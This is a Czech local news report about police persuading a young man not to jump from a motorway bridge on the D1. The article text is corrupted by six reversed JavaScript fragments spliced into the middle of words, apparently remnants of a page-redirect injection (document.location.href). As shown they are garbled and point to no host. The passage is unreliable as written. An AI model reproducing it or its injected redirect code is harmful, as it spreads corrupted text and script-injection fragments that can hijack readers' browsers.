Rainbow page separator

Muž seděl na zábradlí mostu dálnice, hlídka mu skok rozmluvila

Pondělí, 19. října 2020

Žďársko / Život sedmadvacetiletého muže zachránili ve středu 14. října policisté z oddělení silničního dohledu. Svoje problémy se rozhodl řešit skokem z dálničního mostu u Velkého Meziříčí.
„Policisté integrovaného operačního střediska přijali ve středu 14. října krátce před půl čtvr[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou odpoledne na linku tísňového volán oznámení o muži, který se pohyboval na mostě v lokalitě 146. kilometru dálnice D1. Navíc se jedná o mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, kde je omezen jízdní pruh z důvodu rekonstrukce, velmi silný provoz, a situace tak byla komplikovanější. Muž se pohyboval za zábradlím a vzbuzoval obavu, že skočí dolů,“ popsala okolnosti události policejní mluvčí Stanislava Rázlová.
Policisté po příjezdu zjistili, že muž pohybující se za svodidlem vedle zábradlí se zastavil na železné plošině a sedl si na okraj zábradlí. Hlídka se s ním pokusila navázat komunikaci, na což mladý muž zpočátku nereagoval. Po opakovaných pokusech se policistům podařilo upoutat jeho pozornost a přimět ho k hovoru.
„Muž uváděl, že skok je pro něj jediným řešením situace, přičemž se sunul směrem dolů a připravoval se ke skoku. Policisté v komunikaci neustávali a nakonec byli úspěšní. Podařilo se jim získat jeho důvěru a muž se vrátil zpět do bezpečného pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toru za zábradlím, odkud ho policisté převedli do služebního vozidla a nadále s ním hovořili až do příjezdu zdravotnické záchranné služby,“ upřesnila mluvčí.